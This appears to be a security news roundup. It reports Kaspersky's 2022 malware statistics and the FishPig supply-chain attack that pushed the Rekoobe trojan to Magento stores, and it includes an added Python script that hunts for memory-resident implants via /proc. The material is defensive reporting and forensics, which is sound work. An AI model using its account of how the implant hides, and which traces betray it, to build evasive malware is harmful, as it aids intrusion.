“Considering how quickly the threat landscape is expanding its boundaries and the number of new devices appearing in users' daily lives, it's quite possible that next year we'll be detecting not 400,000 malicious files per day, but half a million,” says Vladimir Kuskov, head of anti-malware research, Kaspersky.

"Even more dangerous is that, with the development of Malware-as-a-Service, any novice fraudster can now attack devices without any technical knowledge in programming," Kuskov continues. 

Kaspersky's research also found that the proportion of ransomware detected daily grew by 181 percent compared with 2021, reaching about 9,500 encrypting files per day.

Kaspersky likewise detected a 142 percent rise in downloaders, malware designed to install additional malicious or unwanted applications on a device. Windows remained the platform most targeted by the threat families observed.

Kaspersky's experts detected about 320,000 new malicious files aimed at Windows devices in 2022, the report added.

The number of malicious files targeting Android devices each day also rose by 10 percent in 2022.

Malware Spreads Through FishPig Distribution Server to Infect Magento-Powered Stores

For several weeks, Magento stores have been infected with malware as a result of a supply chain attack on the FishPig distribution server. FishPig specialises in Magento optimisations and Magento-WordPress integrations, and its Magento extensions have been downloaded more than 200,000 times. On Tuesday FishPig warned of an intrusion into its extension licence system in which a threat actor injected malicious PHP code into the Helper/License.php file.

“This file is included in most FishPig extensions so it is best to assume that all FishPig modules had been infected,” FishPig announced.

The hackers likely had access to the company's servers since at least August 6, according to FishPig. Sansec, the security firm that discovered the intrusion, found that the injected code installed a second piece of malware, Rekoobe, which hides as a background process on the compromised server.

Sansec added that the malicious code in License.php downloaded a Linux binary from license.fishpig.co.uk whenever the FishPig control panel was opened in the Magento backend. The file, named 'lic.bin', looks like a licensing asset but is in fact the Rekoobe remote access trojan.

After execution the trojan removes its files from the infected machine but stays resident in memory, impersonating a system service while waiting for instructions from its command-and-control (C&C) server, the researchers said. FishPig says the malicious code has been removed from its servers and all modules have been updated.
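Rekoobe's behaviour as described above, deleting its files after launch and living on only in memory under a service-like name, leaves one reliable trace on Linux: /proc/<pid>/exe still points at the original path, and the kernel appends "(deleted)" to the link target once the file is gone. The Python below is an added example, not Sansec's or FishPig's tooling: it walks a procfs tree, lists processes whose binary no longer exists on disk, and notes where the kernel's process name (comm) disagrees with the executable's basename. So that it runs anywhere, it also builds a small fake /proc tree in a temporary directory; the process names and paths in it are constructed.

```python
import os
import tempfile


def deleted_executable(exe_link):
    """True if the readlink() target carries the kernel's deleted marker."""
    return exe_link.endswith(" (deleted)")


def scan_procfs(proc_root="/proc"):
    """Findings for processes whose binary is gone or whose name mismatches."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pdir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pdir, "exe"))
            with open(os.path.join(pdir, "comm"), encoding="utf-8", errors="replace") as fh:
                comm = fh.read().strip()
        except OSError:
            continue      # kernel threads have no exe; other users' tasks need root
        real_path = exe[:-len(" (deleted)")] if deleted_executable(exe) else exe
        # comm is truncated to 15 chars by the kernel, so compare on that prefix
        name_mismatch = os.path.basename(real_path)[:15] != comm[:15]
        signals = []
        if deleted_executable(exe):
            signals.append("binary deleted on disk")
        if name_mismatch:
            signals.append(f"comm '{comm}' != exe '{os.path.basename(real_path)}'")
        if signals:
            findings.append({"pid": int(entry), "comm": comm, "exe": exe,
                             "signals": signals})
    return sorted(findings, key=lambda f: f["pid"])


def make_fake_procfs(root):
    """Constructed /proc stand-in: one benign shell, one memory-resident implant."""
    for pid, comm, exe in ((1200, "bash", "/usr/bin/bash"),
                           (4311, "sshd", "/var/www/html/lic.bin (deleted)")):
        pdir = os.path.join(root, str(pid))
        os.makedirs(pdir)
        with open(os.path.join(pdir, "comm"), "w", encoding="utf-8") as fh:
            fh.write(comm + "\n")
        os.symlink(exe, os.path.join(pdir, "exe"))   # a dangling link is fine here
    os.makedirs(os.path.join(root, "sys"))            # non-numeric entry, skipped
    return root


def demo():
    """Run the scanner over the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_procfs(make_fake_procfs(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f)
    # On a real host: scan_procfs("/proc"), as root to see every process.
```

Two caveats for real hosts: a long-running daemon shows "(deleted)" legitimately after a package upgrade replaced its binary, so weight the finding by where the path lived (a web root or /tmp is far more alarming than /usr/sbin), and interpreters such as python3 always have comm and basename mismatches. When a hit looks real, copy the running image out of /proc/<pid>/exe before killing the process, since the on-disk file is already gone.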

“It is recommended to upgrade all FishPig modules or reinstall existing versions from the source, regardless of whether or not you are using extensions known to be infected. This will ensure clean and secure code on your system,” FishPig announced.